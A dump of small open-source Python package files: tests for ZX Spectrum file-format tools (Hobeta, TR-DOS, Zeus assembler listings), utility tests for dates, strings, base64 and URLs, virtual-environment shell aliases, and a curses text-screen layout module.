b"\x34\x30\x34\x30\x30\x20\x20\x20\x20\x20\x20\x20\x44\x45\x43\x20"
b"\x48\x0A\x34\x30\x34\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44"
b"\x20\x28\x32\x33\x36\x30\x36\x29\x2C\x48\x4C\x0A\x34\x30\x34\x32"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x52\x45\x54\x0A\x34\x30\x34\x33"
b"\x30\x20\x46\x46\x49\x4C\x45\x20\x4C\x44\x20\x41\x2C\x28\x32\x30"
b"\x37\x30\x38\x29\x0A\x34\x30\x34\x34\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x43\x50\x20\x30\x0A\x34\x30\x34\x35\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x4A\x52\x20\x5A\x2C\x4E\x46\x49\x4C\x45\x0A\x34\x30\x34"
b"\x36\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x2C\x41\x0A"
b"\x34\x30\x34\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44"
b"\x45\x2C\x31\x38\x34\x33\x32\x0A\x34\x30\x34\x38\x30\x20\x46\x46"
b"\x32\x20\x20\x20\x4C\x44\x20\x48\x4C\x2C\x46\x4E\x41\x4D\x45\x0A"
b"\x34\x30\x34\x39\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28"
b"\x50\x44\x45\x29\x2C\x44\x45\x0A\x34\x30\x35\x30\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x4C\x44\x20\x28\x50\x42\x43\x29\x2C\x42\x43\x0A"
b"\x34\x30\x35\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42"
b"\x2C\x38\x0A\x34\x30\x35\x32\x30\x20\x46\x46\x33\x20\x20\x20\x4C"
b"\x44\x20\x41\x2C\x28\x44\x45\x29\x0A\x34\x30\x35\x33\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x43\x50\x20\x28\x48\x4C\x29\x0A\x34\x30\x35"
b"\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4A\x52\x20\x4E\x5A\x2C\x4E"
b"\x45\x58\x54\x46\x0A\x34\x30\x35\x35\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x49\x4E\x43\x20\x44\x45\x0A\x34\x30\x35\x36\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x49\x4E\x43\x20\x48\x4C\x0A\x34\x30\x35\x37\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x44\x4A\x4E\x5A\x20\x46\x46\x33\x0A"
b"\x34\x30\x35\x38\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x41"
b"\x2C\x28\x44\x45\x29\x0A\x34\x30\x35\x39\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x43\x50\x20\x36\x39\x0A\x34\x30\x36\x30\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x4A\x52\x20\x4E\x5A\x2C\x4E\x45\x58\x54\x46\x0A"
b"\x34\x30\x36\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x48"
b"\x4C\x2C\x36\x0A\x34\x30\x36\x32\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x41\x44\x44\x20\x48\x4C\x2C\x44\x45\x0A\x34\x30\x36\x33\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x41\x2C\x28\x48\x4C\x29\x0A"
b"\x34\x30\x36\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28"
b"\x53\x45\x43\x29\x2C\x41\x0A\x34\x30\x36\x35\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x49\x4E\x43\x20\x48\x4C\x0A\x34\x30\x36\x36\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x41\x2C\x28\x48\x4C\x29\x0A"
b"\x34\x30\x36\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28"
b"\x54\x52\x43\x29\x2C\x41\x0A\x34\x30\x36\x38\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x4A\x50\x20\x4C\x4F\x41\x32\x0A\x34\x30\x36\x39\x30"
b"\x20\x4E\x45\x58\x54\x46\x20\x4C\x44\x20\x44\x45\x2C\x28\x50\x44"
b"\x45\x29\x0A\x34\x30\x37\x30\x30\x20\x20\x20\x20\x20\x20\x20\x4C"
b"\x44\x20\x48\x4C\x2C\x31\x36\x0A\x34\x30\x37\x31\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x41\x44\x44\x20\x48\x4C\x2C\x44\x45\x0A\x34\x30"
b"\x37\x32\x30\x20\x20\x20\x20\x20\x20\x20\x45\x58\x20\x44\x45\x2C"
b"\x48\x4C\x0A\x34\x30\x37\x33\x30\x20\x20\x20\x20\x20\x20\x20\x4C"
b"\x44\x20\x42\x43\x2C\x28\x50\x42\x43\x29\x0A\x34\x30\x37\x34\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x44\x4A\x4E\x5A\x20\x46\x46\x32\x0A"
b"\x34\x30\x37\x35\x30\x20\x4E\x46\x49\x4C\x45\x20\x43\x41\x4C\x4C"
b"\x20\x4E\x45\x57\x53\x48\x0A\x34\x30\x37\x36\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x4D\x53\x47\x32\x0A\x34\x30"
b"\x37\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x43\x2C"
b"\x4D\x53\x47\x33\x2D\x4D\x53\x47\x32\x0A\x34\x30\x37\x38\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x23\x32\x30\x33\x43"
b"\x0A\x34\x30\x37\x38\x31\x20\x20\x20\x20\x20\x20\x20\x43\x41\x4C"
b"\x4C\x20\x42\x45\x45\x50\x0A\x34\x30\x37\x38\x32\x20\x20\x20\x20"
b"\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x4D\x53\x47\x33\x0A\x34\x30"
b"\x37\x38\x33\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x43\x2C"
b"\x54\x52\x43\x2D\x4D\x53\x47\x33\x0A\x34\x30\x37\x38\x34\x20\x20"
b"\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x23\x32\x30\x33\x43\x0A"
b"\x34\x30\x38\x30\x30\x20\x43\x41\x4C\x4C\x20\x50\x41\x55\x53\x3A"
b"\x43\x41\x4C\x4C\x20\x53\x54\x41\x4E\x44\x0A\x34\x30\x38\x31\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x4A\x50\x20\x4C\x4F\x41\x44\x0A\x34"
b"\x30\x38\x32\x30\x20\x50\x41\x55\x53\x20\x20\x58\x4F\x52\x20\x41"
b"\x0A\x34\x30\x38\x33\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20"
b"\x28\x32\x33\x35\x36\x30\x29\x2C\x41\x0A\x34\x30\x38\x34\x30\x20"
b"\x50\x41\x32\x20\x20\x20\x4C\x44\x20\x41\x2C\x28\x32\x33\x35\x36"
b"\x30\x29\x0A\x34\x30\x38\x35\x30\x20\x20\x20\x20\x20\x20\x20\x43"
b"\x50\x20\x30\x0A\x34\x30\x38\x36\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x52\x45\x54\x20\x4E\x5A\x0A\x34\x30\x38\x37\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x4A\x52\x20\x50\x41\x32\x0A\x34\x30\x38\x38\x30\x20"
b"\x42\x45\x45\x50\x20\x20\x4C\x44\x20\x44\x45\x2C\x23\x30\x31\x30"
b"\x35\x0A\x34\x30\x38\x39\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44"
b"\x20\x48\x4C\x2C\x23\x30\x36\x36\x36\x0A\x34\x30\x39\x30\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x23\x30\x33\x42\x35"
b"\x0A\x34\x30\x39\x31\x30\x20\x20\x20\x20\x20\x20\x20\x52\x45\x54"
b"\x0A\x34\x30\x39\x32\x30\x20\x4C\x4F\x41\x44\x20\x20\x4C\x44\x20"
b"\x48\x4C\x2C\x32\x32\x35\x36\x30\x0A\x34\x30\x39\x33\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x32\x32\x35\x36\x31"
b"\x0A\x34\x30\x39\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20"
b"\x42\x43\x2C\x37\x33\x36\x0A\x34\x30\x39\x35\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x4C\x44\x20\x28\x48\x4C\x29\x2C\x30\x0A\x34\x30\x39"
b"\x36\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x49\x52\x0A\x34\x30"
b"\x39\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x43\x2C"
b"\x23\x30\x39\x30\x35\x0A\x34\x30\x39\x38\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x4C\x44\x20\x44\x45\x2C\x30\x0A\x34\x30\x39\x39\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x48\x4C\x2C\x31\x38\x34\x33"
b"\x32\x0A\x34\x31\x30\x30\x30\x20\x20\x20\x20\x20\x20\x20\x43\x41"
b"\x4C\x4C\x20\x31\x35\x36\x33\x35\x0A\x34\x31\x30\x31\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x4A\x50\x20\x46\x46\x49\x4C\x45\x0A\x34\x31"
b"\x30\x32\x30\x20\x4C\x4F\x41\x32\x20\x20\x4C\x44\x20\x41\x2C\x28"
b"\x53\x45\x43\x29\x0A\x34\x31\x30\x33\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x4C\x44\x20\x45\x2C\x41\x0A\x34\x31\x30\x34\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x4C\x44\x20\x41\x2C\x28\x54\x52\x43\x29\x0A\x34"
b"\x31\x30\x35\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x2C"
b"\x41\x0A\x34\x31\x30\x36\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44"
b"\x20\x42\x43\x2C\x23\x32\x36\x30\x35\x0A\x34\x31\x30\x37\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x48\x4C\x2C\x33\x30\x30\x30"
b"\x30\x0A\x34\x31\x30\x38\x30\x20\x20\x20\x20\x20\x20\x20\x43\x41"
b"\x4C\x4C\x20\x31\x35\x36\x33\x35\x0A\x34\x31\x30\x39\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x4A\x50\x20\x33\x31\x36\x39\x33\x0A\x36\x30"
b"\x30\x30\x30\x20\x41\x44\x52\x53\x48\x20\x45\x51\x55\x20\x33\x30"
b"\x30\x30\x30\x0A\x36\x30\x30\x31\x30\x20\x4D\x53\x47\x31\x20\x20"
b"\x44\x45\x46\x42\x20\x32\x32\x2C\x30\x2C\x30\x2C\x31\x37\x2C\x30"
b"\x0A\x36\x30\x30\x32\x30\x20\x20\x20\x20\x20\x20\x20\x44\x45\x46"
b"\x42\x20\x31\x36\x2C\x37\x0A\x36\x30\x30\x33\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x46\x4F\x4E\x54\x20\x45\x44\x49\x54\x4F\x52\x20\x62"
b"\x79\x20\x4C\x79\x61\x22\x0A\x36\x30\x30\x34\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x64\x76\x69\x6E\x73\x6B\x79\x20\x4B\x69\x72\x69\x6C"
b"\x6C\x22\x0A\x36\x30\x30\x35\x30\x20\x46\x4E\x41\x4D\x45\x20\x44"
b"\x45\x46\x4D\x20\x22\x65\x64\x69\x74\x6F\x72\x20\x20\x22\x0A\x36"
b"\x30\x30\x36\x30\x20\x50\x44\x45\x20\x20\x20\x44\x45\x46\x57\x20"
b"\x30\x0A\x36\x30\x30\x37\x30\x20\x50\x42\x43\x20\x20\x20\x44\x45"
b"\x46\x57\x20\x30\x0A\x36\x30\x30\x38\x30\x20\x4D\x53\x47\x32\x20"
b"\x20\x44\x45\x46\x42\x20\x32\x32\x2C\x35\x2C\x30\x2C\x31\x37\x2C"
b"\x30\x0A\x36\x30\x30\x39\x30\x20\x44\x45\x46\x42\x20\x31\x36\x2C"
b"\x37\x2C\x31\x39\x2C\x31\x0A\x36\x30\x31\x30\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x46\x69\x6C\x65\x20\x27\x65\x64\x69\x74\x6F\x72\x20"
b"\x20\x3C\x45\x3E\x27\x22\x0A\x36\x30\x31\x31\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x20\x6E\x6F\x74\x20\x66\x6F\x75\x6E\x64\x22\x0A\x36"
b"\x30\x31\x32\x30\x20\x4D\x53\x47\x33\x20\x20\x44\x45\x46\x42\x20"
b"\x32\x32\x2C\x36\x2C\x30\x2C\x31\x37\x2C\x30\x0A\x36\x30\x31\x32"
b"\x35\x20\x20\x20\x20\x20\x20\x20\x44\x45\x46\x42\x20\x31\x36\x2C"
b"\x37\x2C\x31\x39\x2C\x30\x0A\x36\x30\x31\x33\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x50\x52\x45\x53\x53\x20\x41\x4E\x59\x20\x4B\x45\x59"
b"\x20\x46\x4F\x52\x20\x22\x0A\x36\x30\x31\x34\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x52\x45\x4C\x4F\x41\x44\x20\x46\x49\x4C\x45\x22\x0A"
b"\x36\x30\x31\x36\x30\x20\x54\x52\x43\x20\x20\x20\x44\x45\x46\x42"
b"\x20\x30\x0A\x36\x30\x31\x37\x30\x20\x53\x45\x43\x20\x20\x20\x44"
b"\x45\x46\x42\x20\x30\x0A\x36\x30\x31\x38\x30\x20\x45\x4E\x44\x32"
b"\x20\x20\x4E\x4F\x50\x0A"
)
if __name__ == '__main__':
unittest.main()
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/test/test_zeus2txt.py
|
test_zeus2txt.py
|
#! /usr/bin/env python
# vim: set fileencoding=utf-8 :
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Kirill V. Lyadvinsky
# http://www.codeatcpp.com
#
# Licensed under the BSD 3-Clause license.
# See LICENSE file in the project root for full license information.
#
""" hobeta.py tests """
import os
import io
import struct
import unittest
import tempfile
from collections import namedtuple
from zxtools import hobeta
class TestHobeta(unittest.TestCase):
def test_args_parser(self):
with self.assertRaises(SystemExit):
hobeta.parse_args(("-h", "-v"))
with self.assertRaises(SystemExit):
hobeta.parse_args(())
temp_in_file = tempfile.mkstemp()[1]
input_file = open(temp_in_file, "w")
input_file.close()
temp_out_file = tempfile.mkstemp()[1]
try:
args = hobeta.parse_args(("info", temp_in_file))
self.assertEqual(args.func, hobeta.show_info)
args.hobeta_file.close()
args = hobeta.parse_args(("strip", temp_in_file, temp_out_file))
self.assertEqual(args.func, hobeta.strip_header)
args.hobeta_file.close()
args.output_file.close()
finally:
os.remove(temp_in_file)
os.remove(temp_out_file)
def test_checksum(self):
data = b'F.load.AC\x00\x80\xf9\x06\x00\x07'
self.assertEqual(hobeta.calc_checksum(data), 20661)
def test_format_size(self):
header_len = struct.calcsize(hobeta.HEADER_FMT)
self.assertEqual(header_len, 17)
def test_format(self):
data = b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41" \
b"\x43\x00\x80\xF9\x06\x00\x07\xB5\x50"
record = hobeta.Header._make(struct.unpack_from(hobeta.HEADER_FMT,
data))
self.assertEqual(record.filename, b"F.load.A")
self.assertEqual(record.filetype, ord('C'))
self.assertEqual(record.start, 32768)
self.assertEqual(record.length, 1785)
self.assertEqual(record.first_sector, 0)
self.assertEqual(record.occupied_sectors, 7)
self.assertEqual(record.check_sum, 20661)
def test_parse_info(self):
test_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\xF9\x06\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72\x20")
header, crc = hobeta.parse_info(test_file)
self.assertEqual(header.filename, b"F.load.A")
self.assertEqual(header.filetype, ord('C'))
self.assertEqual(header.start, 32768)
self.assertEqual(header.length, 1785)
self.assertEqual(header.first_sector, 0)
self.assertEqual(header.occupied_sectors, 7)
self.assertEqual(header.check_sum, 20661)
self.assertEqual(header.check_sum, crc)
def test_parse_info2(self):
test_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\x02\x00\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72\x20")
header, crc = hobeta.parse_info(test_file)
self.assertEqual(header.filename, b"F.load.A")
self.assertEqual(header.filetype, ord('C'))
self.assertEqual(header.start, 32768)
self.assertEqual(header.length, 2)
self.assertEqual(header.first_sector, 0)
self.assertEqual(header.occupied_sectors, 7)
self.assertEqual(header.check_sum, 20661)
self.assertNotEqual(header.check_sum, crc)
@staticmethod
def strip_header(test_input_file, ignore_header_info):
temp_output_path = tempfile.mkstemp()[1]
temp_output_file = open(temp_output_path, "wb")
args = namedtuple('Args', "hobeta_file output_file ignore_header")
parsed_args = args(test_input_file,
temp_output_file,
ignore_header_info)
copied_bytes = hobeta.strip_header(parsed_args)
return temp_output_path, copied_bytes
def test_strip_header1(self):
test_input_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\xF9\x06\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72")
temp_output_path, bytes_count = self.strip_header(
test_input_file, True)
temp_output_file = open(temp_output_path, "rb")
temp_output_file.seek(0, os.SEEK_END)
try:
self.assertEqual(temp_output_file.tell(), 14)
self.assertEqual(bytes_count, 14)
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_strip_header2(self):
test_input_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\xF9\x06\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72\x20\x20")
temp_output_path, bytes_count = self.strip_header(
test_input_file, False)
temp_output_file = open(temp_output_path, "rb")
temp_output_file.seek(0, os.SEEK_END)
try:
self.assertEqual(temp_output_file.tell(), 16)
self.assertEqual(bytes_count, 16)
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_strip_header3(self):
test_input_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\x0A\x00\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72\x20")
temp_output_path, bytes_count = self.strip_header(
test_input_file, False)
temp_output_file = open(temp_output_path, "rb")
temp_output_file.seek(0, os.SEEK_END)
try:
self.assertEqual(temp_output_file.tell(), 10)
self.assertEqual(bytes_count, 10)
finally:
temp_output_file.close()
os.remove(temp_output_path)
if __name__ == '__main__':
unittest.main()
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/test/test_hobeta.py
|
test_hobeta.py
|
#! /usr/bin/env python
# vim: set fileencoding=utf-8 :
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Kirill V. Lyadvinsky
# http://www.codeatcpp.com
#
# Licensed under the BSD 3-Clause license.
# See LICENSE file in the project root for full license information.
#
""" trdos.py tests """
import unittest
import struct
from zxtools import trdos
class TestTRDos(unittest.TestCase):
def test_fat_format(self):
data = b"filenameC\x00\x80\xf9\x06\x07\xC1\x01"
record = trdos.FATRecord._make(
struct.unpack_from(trdos.FAT_RECORD_FMT, data))
self.assertEqual(record.filename, b"filename")
self.assertEqual(record.filetype, ord("C"))
self.assertEqual(record.start, 32768)
self.assertEqual(record.length, 1785)
self.assertEqual(record.occupied_sectors, 0x07)
self.assertEqual(record.first_sector, 0xC1)
self.assertEqual(record.first_track, 0x01)
if __name__ == '__main__':
unittest.main()
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/test/test_trdos.py
|
test_trdos.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from datetime import datetime
from zxutils.pytime import str_to_date, ts_to_date
def test_ts_to_date():
assert ts_to_date(1574232324) is not None
assert ts_to_date(1574232316000) is not None
def test_text_to_date():
assert str_to_date("2017-07-09") == datetime(2017, 7, 9)
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pytime.py
|
test_pytime.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/21
# Desc:
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyspider.py
|
test_pyspider.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from zxutils.pyimg import download_img, img_to_base64
def test_download_img():
test_img_url = "https://file.cibfintech.com/file/M00/00/5C/CiADdV0S6BiAGT-bAAKutEZzfC8967.jpg"
filename, status = download_img(test_img_url)
assert status == "success"
def test_img_to_base64():
test_img_filename = "CiADdV0S6BiAGT-bAAKutEZzfC8967.jpg"
img_to_base64(test_img_filename)
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyimg.py
|
test_pyimg.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from zxutils.pystr import bytes_to_str, str_to_bytes
def test_str_to_bytes():
assert str_to_bytes("zx") == b'zx'
assert str_to_bytes("一", encoding="gbk") == b'\xd2\xbb'
assert str_to_bytes("一", encoding="gb2312") == b'\xd2\xbb'
def test_bytes_to_str():
assert bytes_to_str(b'hello') == "hello"
assert bytes_to_str(b'\xd2\xbb', encoding="gb2312") == "一"
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pystr.py
|
test_pystr.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from zxutils.pyencrypt import str_to_md5, bytes_to_base64, base64_to_bytes
def test_build_hash():
assert str_to_md5("hello") == "5d41402abc4b2a76b9719d911017c592"
def test_bytes_to_base64():
assert bytes_to_base64(b'hello') == 'aGVsbG8='
def test_base64_to_bytes():
assert base64_to_bytes("aGVsbG8=") == b'hello'
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyencrypt.py
|
test_pyencrypt.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from zxutils.pyurl import build_url, get_page, unpack_url
def test_get_page():
test_url = "https://ss0.bdstatic.com/5aV1bjqh_Q23odCf/static/superlanding/img/logo_top.png"
assert get_page(test_url) is not None
def test_build_url():
base_url = "https://www.example.com"
assert build_url(base_url, {"name": "zx"}) == "https://www.example.com?name=zx"
def test_unpack_url():
test_url = "https://www.example.com?name=zx&age=11"
assert unpack_url(test_url) == ("https://www.example.com", {"name": "zx", "age": 11})
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyurl.py
|
test_pyurl.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyfile.py
|
test_pyfile.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/__init__.py
|
__init__.py
|
#!/bin/bash
if ! command -v python &> /dev/null
then
echo "python not found, (python-is-python3 not installed?)"
else
python -m zxvcv.cmdutil.pvenv.remove ${@:1}
fi
|
zxvcv.cmdutil
|
/zxvcv.cmdutil-0.5.0-py39-none-any.whl/zxvcv/cmdutil/aliases/unix/venvr.sh
|
venvr.sh
|
#!/bin/bash
if [[ $1 == --help || $1 == "" || $2 == "" ]]; then
echo "Initialize python virtual env"
echo "usage venvi [--help] pyver args"
echo ""
echo "arguments:"
echo " --help show brief help message"
echo " pyver python version which should beused to create virtual environment"
echo " args arguments for python script what will create virtual environment"
else
if ! command -v python$1 &> /dev/null
then
echo "python$1 not found, 'type venvi --help' to display help page"
else
python$1 -m zxvcv.cmdutil.pvenv.initialize ${@:2}
fi
fi
|
zxvcv.cmdutil
|
/zxvcv.cmdutil-0.5.0-py39-none-any.whl/zxvcv/cmdutil/aliases/unix/venvi.sh
|
venvi.sh
|
#!/bin/bash
if ! command -v python &> /dev/null
then
echo "python not found, (python-is-python3 not installed?)"
else
python -m zxvcv.cmdutil.pvenv.list ${@:1}
fi
|
zxvcv.cmdutil
|
/zxvcv.cmdutil-0.5.0-py39-none-any.whl/zxvcv/cmdutil/aliases/unix/venvl.sh
|
venvl.sh
|
#!/bin/bash
if [[ $1 == --help || $1 == "" ]]; then
echo "Activate python virtual env"
echo "usage venva [--help] name"
echo ""
echo "arguments:"
echo " --help show brief help message"
echo " name anme of python virtual environment to activate"
else
export _VENV_NAME=$1
_venva () {
source ~/pythonvenv/$_VENV_NAME/bin/activate
}
_venva
fi
|
zxvcv.cmdutil
|
/zxvcv.cmdutil-0.5.0-py39-none-any.whl/zxvcv/cmdutil/aliases/unix/venva.sh
|
venva.sh
|
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
|
zxvcv.util-cli
|
/zxvcv.util_cli-0.2.6-py311-none-any.whl/zxvcv/__init__.py
|
__init__.py
|
import sys
def main(argv=sys.argv[1:]):
print("Hello zxvcv.util-cli!")
if __name__.rpartition(".")[-1] == "__main__":
sys.exit(main(sys.argv[1:]))
|
zxvcv.util-cli
|
/zxvcv.util_cli-0.2.6-py311-none-any.whl/zxvcv/util_cli/__main__.py
|
__main__.py
|
import curses
# NOTE: bug? mypy doesn't raise an [attr-defined] error here
from curses.textpad import rectangle # type: ignore
from queue import SimpleQueue
from textwrap import wrap
from typing import List, Optional
from .datatypes import Margin, Pair, PairF
class Screen:
def __init__(self, screen):
self.scr = screen
self.vscreen = VScreen(self.scr)
def get_position(self) -> Pair:
data = self.scr.getbegyx()
return Pair(data[1], data[0])
def get_size(self) -> Pair:
data = self.scr.getmaxyx()
return Pair(data[1], data[0])
def draw(self) -> None:
self.vscreen.draw()
def recalculate(self) -> None:
self.vscreen.recalculate(
self.get_size() - Pair(2, 0), self.get_position(), Pair(0, 0), Pair(0, 1)
)
class VScreenTextbox:
def __init__(self, screen: Screen, buffer_size: int = 30):
self._screen = screen
self._rawdata: List[str] = []
self._buffer_size = buffer_size
self.data: List[str] = []
self.position = Pair(0, 0)
self.size = Pair(0, 0)
def add_text(self, text: str) -> None:
new_rawdata = [v.strip() for v in text.split("\n")]
# update formatted data
for ln in new_rawdata:
self.data += wrap(ln, self.size.x)
if len(self.data) > self.size.y:
self.data = self.data[len(self.data) - self.size.y :]
# update rawdata
self._rawdata += new_rawdata
if len(self._rawdata) > self._buffer_size:
self._rawdata = self._rawdata[len(self._rawdata) - self._buffer_size :]
def draw(self) -> None:
for i, v in enumerate(self.data):
self._screen.scr.addstr(
self.position.y + i, self.position.x, v, curses.A_NORMAL # type: ignore
)
def recalculate(self, position: Pair, size: Pair) -> None:
self.position = position
# recalculate formatted data
if self.size != size:
self.data = []
for ln in reversed(self._rawdata):
for i, v in enumerate(wrap(ln, self.size.x)):
self.data.insert(i, v)
if len(self.data) > self.size.y:
break
if len(self.data) > self.size.y:
self.data = self.data[len(self.data) - self.size.y :]
self.size = size
class VScreenLogbox(VScreenTextbox):
def __init__(
self, screen: Screen, data_source: Optional[SimpleQueue] = None, buffer_size: int = 30
):
super().__init__(screen, buffer_size)
self._data_source = data_source
def recalculate(self, position: Pair, size: Pair) -> None:
while self._data_source and (not self._data_source.empty()):
self.add_text(self._data_source.get())
super().recalculate(position, size)
class VScreen:
def __init__(
self,
screen: Screen,
sizep: PairF = PairF(1.0, 1.0),
subscreens: List["VScreen"] = [],
margin: Margin = Margin(0, 0, 0, 0),
data: Optional[VScreenTextbox] = None,
draw_borders: bool = False,
):
self.screen = screen
self.subscreens = subscreens
self.position = Pair(0, 0)
self.size = Pair(0, 0)
self._data = data
self.sizep = sizep
self.margin = margin
self.draw_borders = draw_borders
self.border_margin = Margin(1, 1, 1, 1) if draw_borders else Margin(0, 0, 0, 0)
def draw(self):
if self.draw_borders:
# draw bounds for subscreen
try:
rectangle(
self.screen.scr,
self.position.y,
self.position.x,
self.position.y + self.size.y - 1,
self.position.x + self.size.x - 1,
)
# TODO[PP]: an exception is thrown when drawing in the bottom-right character cell;
# proper handling and the correct exception type should be fixed
except Exception as e:
print(e)
_ = None  # TODO[PP]: workaround for bandit check [B110:try_except_pass]
if self.subscreens:
# draw subscreens
for sscreen in self.subscreens:
sscreen.draw()
else:
# draw data
if self._data:
self._data.draw()
def _get_data_position(self) -> Pair:
return Pair(
self.position.x + self.margin.left + self.border_margin.left,
self.position.y + self.margin.top + self.border_margin.top,
)
def _get_data_size(self) -> Pair:
return Pair(
self.size.x
- self.margin.left
- self.margin.right
- self.border_margin.left
- self.border_margin.right,
self.size.y
- self.margin.top
- self.margin.bottom
- self.border_margin.top
- self.border_margin.bottom,
)
